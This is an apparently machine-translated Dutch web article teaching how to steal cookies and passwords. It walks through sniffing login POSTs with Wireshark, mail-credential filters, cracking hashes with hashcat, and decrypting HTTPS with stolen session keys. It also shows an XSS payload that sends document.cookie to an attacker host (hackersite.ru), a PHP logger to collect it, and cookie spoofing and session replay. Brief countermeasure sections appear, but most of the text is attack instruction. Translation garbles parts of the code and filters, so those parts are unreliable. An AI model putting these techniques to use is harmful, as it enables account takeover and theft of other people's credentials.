Een gemakkelijke manier om cookies te stelen. Methoden voor het stelen van cookies Hoe cookies te onderscheppen

Veel gebruikers realiseren zich niet dat deze gegevens gemakkelijk kunnen worden onderschept door een login en wachtwoord in te vullen bij het registreren of autoriseren op een gesloten internetbron en op ENTER te drukken. Heel vaak worden ze in onbeveiligde vorm over het netwerk verzonden. Als de site waarop u probeert in te loggen het HTTP-protocol gebruikt, is het daarom heel eenvoudig om dit verkeer vast te leggen, te analyseren met Wireshark en vervolgens speciale filters en programma's te gebruiken om het wachtwoord te vinden en te decoderen.

De beste plaats om wachtwoorden te onderscheppen is de kern van het netwerk, waar het verkeer van alle gebruikers naar gesloten bronnen (bijvoorbeeld e-mail) of vóór de router gaat om toegang te krijgen tot internet, bij registratie op externe bronnen. We hebben een spiegel opgezet en we zijn klaar om ons een hacker te voelen.

Stap 1. Installeer en start Wireshark om verkeer vast te leggen

Soms is het hiervoor voldoende om alleen de interface te selecteren waarmee we verkeer willen vastleggen en op de Start-knop te klikken. In ons geval nemen we op via een draadloos netwerk.

Het vastleggen van het verkeer is begonnen.

Stap 2. Filteren van vastgelegd POST-verkeer

We openen de browser en proberen in te loggen op een bron met een gebruikersnaam en wachtwoord. Zodra het autorisatieproces is voltooid en de site is geopend, stoppen we met het vastleggen van verkeer in Wireshark. Open vervolgens de protocolanalysator en zie een groot aantal pakketten. Het is op dit punt dat de meeste IT-professionals het opgeven omdat ze niet weten wat ze vervolgens moeten doen. Maar we kennen en zijn geïnteresseerd in specifieke pakketten die POST-gegevens bevatten die op onze lokale machine worden gegenereerd bij het invullen van een formulier op het scherm en naar een externe server worden verzonden wanneer we op de knop ‘Inloggen’ of ‘Autorisatie’ in de browser klikken.

We voeren een speciaal filter in het venster in om vastgelegde pakketten weer te geven: http.verzoek.methode == “NA"

En we zien, in plaats van duizenden pakketten, er maar één met de gegevens die we zoeken.

Stap 3. Zoek de login en het wachtwoord van de gebruiker

Klik snel met de rechtermuisknop en selecteer het item in het menu Volg TCP Steam


Hierna verschijnt tekst in een nieuw venster dat de inhoud van de pagina in code herstelt. Laten we de velden "wachtwoord" en "gebruiker" zoeken, die overeenkomen met het wachtwoord en de gebruikersnaam. In sommige gevallen zullen beide velden gemakkelijk leesbaar zijn en zelfs niet gecodeerd, maar als we verkeer proberen vast te leggen bij toegang tot zeer bekende bronnen zoals Mail.ru, Facebook, VKontakte, enz., Dan wordt het wachtwoord gecodeerd:

HTTP/1.1 302 gevonden

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAi COM NAV ONZE OTRO STP IND DEM"

Set-Cookie: wachtwoord= ; vervalt=do, 07-nov-2024 23:52:21 GMT; pad=/

Locatie: ingelogd.php

Inhoud-lengte: 0

Verbinding: dichtbij

Inhoudstype: tekst/html; tekenset=UTF-8

In ons geval dus:

Gebruikersnaam: netwerkguru

Wachtwoord:

Stap 4. Bepaal het coderingstype om het wachtwoord te decoderen

Ga bijvoorbeeld naar de website http://www.onlinehashcrack.com/hash-identification.php#res en voer ons wachtwoord in het identificatievenster in. Ik kreeg een lijst met coderingsprotocollen in volgorde van prioriteit:

Stap 5. Het gebruikerswachtwoord decoderen

In dit stadium kunnen we het hashcat-hulpprogramma gebruiken:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Bij de uitgang ontvingen we een gedecodeerd wachtwoord: simplepassword

Met de hulp van Wireshark kunnen we dus niet alleen problemen bij de werking van applicaties en services oplossen, maar onszelf ook als hacker uitproberen door wachtwoorden te onderscheppen die gebruikers in webformulieren invoeren. U kunt ook wachtwoorden voor gebruikersmailboxen achterhalen met behulp van eenvoudige filters:

  • Het POP-protocol en filter zien er als volgt uit: pop.request.command == "USER" || pop.request.command == "PASS"
  • Het IMAP-protocol en filter zijn: imap.request bevat "inloggen"
  • Het protocol is SMTP en u moet het volgende filter invoeren: smtp.req.command == "AUTH"

en serieuzere hulpprogramma's voor het decoderen van het coderingsprotocol.

Stap 6: Wat moet ik doen als het verkeer gecodeerd is en HTTPS gebruikt?

Er zijn verschillende opties om deze vraag te beantwoorden.

Optie 1. Maak verbinding wanneer de verbinding tussen de gebruiker en de server wordt verbroken en leg verkeer vast op het moment dat de verbinding tot stand wordt gebracht (SSL Handshake). Wanneer er een verbinding tot stand is gebracht, kan de sessiesleutel worden onderschept.

Optie 2: U kunt HTTPS-verkeer decoderen met behulp van het sessiesleutellogbestand dat is vastgelegd door Firefox of Chrome. Om dit te doen, moet de browser worden geconfigureerd om deze coderingssleutels naar een logbestand te schrijven (op FireFox gebaseerd voorbeeld) en u zou dat logbestand moeten ontvangen. In wezen moet u het sessiesleutelbestand van de harde schijf van een andere gebruiker stelen (wat illegaal is). Leg dan het verkeer vast en gebruik de resulterende sleutel om het te decoderen.

Verduidelijking. We hebben het over de webbrowser van een persoon wiens wachtwoord hij probeert te stelen. Als we bedoelen dat we ons eigen HTTPS-verkeer moeten ontsleutelen en willen oefenen, dan zal deze strategie werken. Als u het HTTPS-verkeer van andere gebruikers probeert te decoderen zonder toegang tot hun computers, zal dit niet werken - dat is zowel codering als privacy.

Nadat u de sleutels volgens optie 1 of 2 heeft ontvangen, moet u deze registreren in WireShark:

  1. Ga naar het menu Bewerken - Voorkeuren - Protocollen - SSL.
  2. Zet de vlag “SSL-records opnieuw samenstellen die meerdere TCP-segmenten overspannen”.
  3. “RSA-sleutellijst” en klik op Bewerken.
  4. Voer de gegevens in alle velden in en schrijf het pad in het bestand met de sleutel

Op de afbeelding is te zien dat de cookie de regel wordpress_logged_in_263d663a02379b7624b1028a58464038=admin bevat. Deze waarde bevindt zich in een niet-versleutelde vorm in de cookie en kan eenvoudig worden onderschept met behulp van het Achilles-hulpprogramma, maar in de meeste gevallen kunt u in Achilles alleen de hash van een bepaald item zien. Voordat u het verzoek naar de server verzendt, kunt u proberen deze regel te vervangen door een soortgelijke regel (hoewel het in dit geval geen zin heeft) - het aantal pogingen is niet beperkt. Door dit verzoek vervolgens via de knop Verzenden naar de server te sturen, kunt u een reactie van de server ontvangen die bestemd is voor de beheerder.

In het vorige voorbeeld kunt u directe gebruikers-ID-spoofing gebruiken. Bovendien kan de naam van de parameter, waarvan de waardevervanging extra mogelijkheden voor de hacker biedt, de volgende zijn: gebruiker (bijvoorbeeld USER=JDOE), elke expressie met een ID-tekenreeks (bijvoorbeeld USER=JDOE of SESSIONID= BLAHBLAH), admin (bijvoorbeeld ADMIN= TRUE), sessie (bijvoorbeeld SESSION=ACTIVE), winkelwagen (bijvoorbeeld CART=FULL), evenals expressies zoals TRUE, FALSE, ACTIVE, INACTIVE. Het formaat van cookies is doorgaans sterk afhankelijk van de toepassing waarvoor ze worden gebruikt. Deze tips voor het opsporen van applicatiefouten met behulp van cookies gelden echter voor vrijwel alle formaten.

Tegenmaatregelen aan de clientzijde tegen het verwijderen van cookies

Over het algemeen moeten gebruikers op hun hoede zijn voor websites die cookies gebruiken voor authenticatie en om gevoelige gegevens op te slaan. Het is ook noodzakelijk om te onthouden dat een website die cookies gebruikt voor authenticatie ten minste het SSL-protocol moet ondersteunen om de gebruikersnaam en het wachtwoord te coderen, aangezien bij afwezigheid van dit protocol de gegevens onversleuteld worden verzonden, waardoor ze kunnen worden onderschept. met behulp van eenvoudige softwaretools om gegevens te bekijken die via het netwerk worden verzonden.

Kookaburra Software heeft een tool ontwikkeld om het gebruik van cookies te vergemakkelijken. De tool heet CookiePal ( http://www.kburra.com/cpal.html (zie www.kburra.com)). Dit programma is ontworpen om de gebruiker te waarschuwen wanneer een website een cookie op de machine probeert te installeren, en de gebruiker kan deze actie toestaan ​​of weigeren. Soortgelijke functies voor het blokkeren van cookies zijn tegenwoordig in alle browsers beschikbaar.

Een andere reden om regelmatig webbrowserupdates te installeren is dat er voortdurend beveiligingsfouten in deze programma's worden ontdekt. Dus creëerden Bennet Haselton en Jamie McCarthy een script dat, na op een link te klikken, cookies ophaalt van de machine van de klant. Als gevolg hiervan wordt alle inhoud van de cookies die op de computer van de gebruiker staan ​​beschikbaar.

Dit soort hacken kan ook met behulp van het handvat

Om ervoor te zorgen dat dergelijke zaken onze persoonsgegevens niet in gevaar brengen, doe ik dit zelf en raad ik iedereen aan om altijd software te updaten die met HTML-code werkt (e-mailclients, mediaspelers, browsers etc.).

Veel mensen geven er de voorkeur aan cookies eenvoudigweg te blokkeren, maar de meeste websites vereisen dat cookies worden gebruikt. Conclusie - als er in de nabije toekomst een innovatieve technologie verschijnt waarmee je het zonder cookies kunt stellen, zullen programmeurs en beheerders opgelucht ademhalen, maar cookies blijven voorlopig een smakelijk hapje voor een hacker! Dit klopt, aangezien er nog geen beter alternatief bestaat.

Tegenmaatregelen aan de serverzijde

In het geval van aanbevelingen om de serverbeveiliging te garanderen, geven experts één eenvoudig advies: gebruik het cookiemechanisme niet tenzij het absoluut noodzakelijk is! Bijzondere voorzichtigheid is geboden bij het gebruik van cookies die na het einde van de communicatiesessie op het systeem van de gebruiker blijven staan.

Het is uiteraard belangrijk om te begrijpen dat cookies kunnen worden gebruikt om beveiliging te bieden aan webservers voor gebruikersauthenticatie. Als uw toepassing cookies moet gebruiken, moet u het cookiemechanisme configureren om voor elke sessie verschillende kortstondige sleutels te gebruiken, en proberen geen informatie in deze bestanden te plaatsen die door hackers zou kunnen worden gebruikt voor hacking (zoals ADMIN=TRUE). .

Om uw gebruik van cookies veiliger te maken, kunt u bovendien cookie-encryptie gebruiken om te voorkomen dat gevoelige informatie wordt geëxtraheerd. Natuurlijk lost encryptie niet alle beveiligingsproblemen op bij het werken met cookietechnologie, maar deze methode voorkomt wel de meest elementaire hacks die hierboven zijn beschreven.

Wat is een koekje?

Er is een mechanisme waarmee de http-server tekstinformatie op de computer van de gebruiker kan opslaan en er vervolgens toegang toe kan krijgen. Deze informatie wordt een cookie genoemd. In wezen is elke cookie een paar: de naam van een parameter en de waarde ervan. Aan elke cookie wordt ook het domein toegewezen waartoe deze behoort. Om veiligheidsredenen heeft de http-server in alle browsers alleen toegang tot de cookie van zijn domein. Bovendien kunnen cookies een vervaldatum hebben. In dat geval blijven ze tot deze datum op de computer opgeslagen, zelfs als u alle browservensters sluit.


Waarom zijn cookies belangrijk?

Alle multi-user systemen gebruiken cookies om de gebruiker te identificeren. Meer precies: de huidige verbinding van de gebruiker met de dienst, gebruikerssessie. Als iemand uw cookies herkent, kan hij of zij namens u inloggen op het systeem. Omdat momenteel maar heel weinig internetbronnen tijdens één gebruikerssessie controleren op IP-adreswijzigingen.


Hoe cookies wijzigen of vervangen?

Browserontwikkelaars bieden geen ingebouwde tools voor het bewerken van cookies. Maar je kunt wel rondkomen met een gewoon notitieblok.


Stap 1: maak een tekstbestand met tekst

Windows Register-editor versie 5.00



@="C:\\IE_ext.htm"

Sla het op onder de naam IE_ext.reg

Stap 2: Voeg met behulp van het gemaakte bestand wijzigingen toe aan het Windows-register.

Stap 3: maak een tekstbestand met tekst

< script taal = "javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

extern.menuArgumenten.document.cookie= "testnaam=testwaarde; pad=/; domein=testdomein.ru";
alert(extern.menuArgumenten.document.cookie);


Sla het op onder de naam C:\IE_ext.htm

Stap 4: We gaan naar de website waarin we geïnteresseerd zijn.

Stap 5: Klik met de rechtermuisknop op een lege ruimte op de pagina en selecteer het menu-item "Werken met cookies". Geef toegang tot het klembord. Uw cookies van deze site gaan naar het klembord. Je kunt hun notitieblok erin steken en een kijkje nemen.


Stap 6: Om sommige cookies te wijzigen, bewerkt u het bestand C:\IE_ext.htm, vervangend test naam in naam van het koekje, testwaarde- over de betekenis ervan, testdomein.ru– naar het sitedomein. Voeg indien nodig meer vergelijkbare regels toe. Voor het gemak van de controle heb ik aan het script de uitvoer van de huidige cookies voor en na de wijziging toegevoegd: alert(extern.menuArgumenten.document.cookie);

Stap 7: Voer stap 5 opnieuw uit en vernieuw vervolgens de pagina.

Kort gezegd: we hebben toegang tot deze internetbron met bijgewerkte cookies.

Hoe cookies stelen met JavaScript?

Als een aanvaller een mogelijkheid weet te vinden om een ​​willekeurig JavaScript-script uit te voeren op de computer van het slachtoffer, dan kan hij de huidige cookies heel gemakkelijk uitlezen. Voorbeeld:


var str= document.cookie;

Maar zal hij ze naar zijn site kunnen overbrengen, omdat, zoals ik eerder heb aangegeven, een JavaScript-script zonder aanvullende bevestiging geen toegang kan krijgen tot een site die zich op een ander domein bevindt? Het blijkt dat een JavaScript-script elke afbeelding op elke http-server kan laden. Breng tegelijkertijd eventuele tekstinformatie in het downloadverzoek over naar deze afbeelding. Voorbeeld: http://hackersite.ru/xss.jpg?text_info Dus als je deze code uitvoert:

var img= nieuw beeld();

img.src= "http://hackersite.ru/xss.jpg?"+ codeURI(document.cookie);


dan komt de cookie terecht in het verzoek om de “foto” te downloaden en “gaat” naar de aanvaller.

Hoe omgaan met dergelijke verzoeken om een ​​“afbeelding” te downloaden?

Een aanvaller hoeft alleen maar een hosting met PHP-ondersteuning te vinden en daar de volgende code te plaatsen:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fsluiten($fp);
?>

Vervolgens worden alle aanvraagparameters voor dit script in het bestand opgeslagen log.txt. Het enige dat overblijft is het vervangen van het eerder beschreven JavaScript-script http://hackersite.ru/xss.jpg naar het pad naar dit php-script.


Kortom

Ik heb alleen de eenvoudigste manier laten zien om XSS-kwetsbaarheden te misbruiken. Maar dit bewijst dat de aanwezigheid van ten minste één dergelijke kwetsbaarheid op een internetsite voor meerdere gebruikers een aanvaller in staat kan stellen de bronnen namens u te gebruiken.

Heeft u zich ooit afgevraagd hoe sommige websites hun bezoekers personaliseren? Dit kan bijvoorbeeld tot uiting komen in het onthouden van de inhoud van de "winkelwagen" (als dit knooppunt bedoeld is voor de verkoop van goederen) of in de manier waarop de velden van een of ander formulier worden ingevuld. Het HTTP-protocol dat ten grondslag ligt aan de werking van het World Wide Web beschikt niet over de middelen om gebeurtenissen van het ene bezoek aan de ene site naar de andere te volgen, daarom is er een speciale add-on ontwikkeld om dergelijke “statussen” op te kunnen slaan. Dit mechanisme, beschreven in RFC 2109, voegt speciale stukjes cookiegegevens in HTTP-verzoeken en -antwoorden waarmee websites hun bezoekers kunnen volgen.

Cookiegegevens kunnen worden opgeslagen voor de duur van de communicatiesessie ( per sessie), blijft één sessie in het RAM en wordt verwijderd wanneer de browser wordt gesloten, of zelfs nadat een bepaalde tijdsperiode is verstreken. In andere gevallen zijn ze permanent ( volhardend), dat als tekstbestand op de harde schijf van de gebruiker blijft staan. Ze worden meestal opgeslagen in de map Cookies (%windir%\Cookies op Win9x en %userprofile%\Cookies op NT/2000). Het is niet moeilijk te raden dat een aanvaller, nadat hij cookies op internet heeft vastgelegd, zich kan voordoen als de gebruiker van een bepaalde computer, of belangrijke informatie uit deze bestanden kan verzamelen. Na het lezen van de volgende paragrafen zult u begrijpen hoe gemakkelijk het is om dit te doen.

Onderschepping van cookies

De meest directe methode is het onderscheppen van cookies terwijl ze via het netwerk worden verzonden. De onderschepte gegevens kunnen vervolgens worden gebruikt bij het inloggen op de juiste server. Dit probleem kan worden opgelost met elk hulpprogramma voor pakketinterceptie, maar een van de beste is het programma van Lavrenty Nikula ( Laurentiu Nicula) SpyNet/PeepNet. SpyNet bevat twee hulpprogramma's die samenwerken. Programma CaptureNet vangt het pakket zelf op en slaat het op schijf op, en het PeepNet-hulpprogramma opent het bestand en converteert het naar een voor mensen leesbaar formaat. Het volgende voorbeeld is een fragment van een door PeepNet gereconstrueerde communicatiesessie, waarbij de cookie dient om de toegang tot de bekeken pagina's te authenticeren en te controleren (namen zijn gewijzigd om de anonimiteit te behouden).

KRIJG http://www.victim.net/images/logo.gif HTTP/1.0 Accepteer: */* Verwijzer: http://www.victim.net/ Host: www.victim.net Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

Het bovenstaande voorbeeld toont een cookiefragment dat is geplaatst in een HTTP-verzoek dat naar de server komt. Het belangrijkste is het veld cuid=, die een unieke identificatie specificeert die wordt gebruikt voor gebruikersauthenticatie op het knooppunt www.victim.net. Laten we zeggen dat de aanvaller hierna het slachtoffer.net-knooppunt bezocht, zijn eigen identificatie en een cookie ontving (ervan uitgaande dat het knooppunt de cookiegegevens niet in het virtuele geheugen plaatst, maar deze naar de harde schijf schrijft). De aanvaller kan vervolgens zijn eigen cookie openen en de veld-ID cuid= vervangen door deze uit het vastgelegde pakket. In dit geval wordt hij bij het inloggen op de slachtoffer.net-server gezien als de gebruiker wiens cookiegegevens zijn onderschept.

Programmeervermogen PeepNet het opnieuw afspelen van de gehele communicatiesessie of het fragment ervan vergemakkelijkt de implementatie van dit soort aanvallen aanzienlijk. Met behulp van een knop Haal het! U kunt de pagina's die een gebruiker heeft bekeken opnieuw ophalen met behulp van de cookiegegevens die eerder door CaptureNet zijn vastgelegd. In het PeepNet-hulpprogramma kunt u informatie zien over iemands voltooide bestellingen. Hierbij wordt gebruik gemaakt van cookiegegevens die door CaptureNet zijn onderschept voor authenticatie. Let op het frame in de rechter benedenhoek van het dialoogvenster met sessiegegevens en de regel die volgt op de regel Cookie:. Dit zijn de cookiegegevens die worden gebruikt voor authenticatie.

Het is een behoorlijk nette truc. Daarnaast het hulpprogramma CaptureNet kan een volledig gedecodeerd verkeersoverzicht opleveren, wat vrijwel gelijk is aan de mogelijkheden van professionele hulpprogramma's zoals Sniffer Pro van Network Associates, Inc. Echter, het nut SpyNet Nog beter: je kunt het gratis krijgen!

Tegenmaatregelen

U moet op uw hoede zijn voor sites die cookies gebruiken voor authenticatie en het opslaan van gevoelige identificatie-informatie. Een hulpmiddel dat kan helpen bij de beveiliging is Cookie Pal van Kookaburra Software, te vinden op http://www.kburra.com/cpal.html. Dit softwareproduct kan worden geconfigureerd om waarschuwingsberichten voor de gebruiker te genereren wanneer een website probeert het cookiemechanisme te gebruiken. In dit geval kunt u "achter de schermen kijken" en beslissen of deze acties moeten worden toegestaan. Internet Explorer heeft een ingebouwd cookiemechanisme. Om dit in te schakelen, start u de applet Internetopties in het Configuratiescherm, gaat u naar het tabblad Beveiliging, selecteert u het item Internetzone, stelt u de modus Aangepast niveau in en stelt u voor permanente en tijdelijke cookiegegevens de schakelaar in op Vragen. Het instellen van het gebruik van cookies in de Netscape-browser gebeurt met behulp van de opdracht Bewerken › Voorkeuren › Geavanceerd en het instellen van de modus Waarschuw mij voordat een cookie wordt geaccepteerd of Cookies uitschakelen (Fig. 16.3). Wanneer u een cookie accepteert, moet u controleren of deze naar de schijf wordt geschreven en kijken of de website informatie over gebruikers verzamelt.

Wanneer u een site bezoekt die cookies gebruikt voor authenticatie, moet u ervoor zorgen dat de gebruikersnaam en het wachtwoord die u aanvankelijk opgeeft ten minste SSL-gecodeerd zijn. Vervolgens verschijnt deze informatie in het PeepNet-programmavenster, althans niet in de vorm van platte tekst.

De auteurs zouden cookies liever volledig vermijden als veel bezochte websites deze optie niet nodig hadden. Voor de wereldwijd populaire Hotmail-service van Microsoft zijn bijvoorbeeld cookies vereist voor registratie. Omdat deze service tijdens het authenticatieproces verschillende servers gebruikt, is het toevoegen ervan aan de zone Vertrouwde sites niet zo eenvoudig (dit proces wordt beschreven in de sectie "Verstandig omgaan met beveiligingszones: een algemene oplossing voor het Activex-besturingsprobleem"). In dit geval zal de aanduiding *.hotmail.com helpen. Cookies zijn geen perfecte oplossing voor het probleem van de onvolledigheid van het HTML-protocol, maar alternatieve benaderingen lijken zelfs nog erger te zijn (bijvoorbeeld het toevoegen van een identificatie aan de URL, die kan worden opgeslagen op proxyservers). Totdat er een beter idee komt, is uw enige optie het beheren van uw cookies met behulp van de hierboven genoemde methoden.

Cookies vastleggen via URL

Laten we ons iets vreselijks voorstellen: gebruikers van Internet Explorer klikken op speciaal vervaardigde hyperlinks en worden potentiële slachtoffers, waarbij ze het risico lopen dat hun cookies worden onderschept. Bennett Haselton ( Bennett Haselton) en Jamie McCarthy ( Jamie McCarthy) van de tienerorganisatie Peacefire, die pleit voor vrijheid van communicatie via internet, publiceerde een script dat dit idee tot leven brengt. Dit script haalt cookies op van de clientcomputer wanneer de gebruiker op een link op deze pagina klikt. Als gevolg hiervan wordt de inhoud van de cookie beschikbaar voor website-exploitanten.

Deze functie kan voor schandelijke doeleinden worden misbruikt door IFRAME-tags in de HTML van een webpagina, HTML-e-mail of nieuwsgroeppost in te sluiten. Het volgende voorbeeld, gegeven door beveiligingsadviseur Richard M. Smith, demonstreert de mogelijkheid om IFRAME-handles te gebruiken met een hulpprogramma ontwikkeld door Peacefire.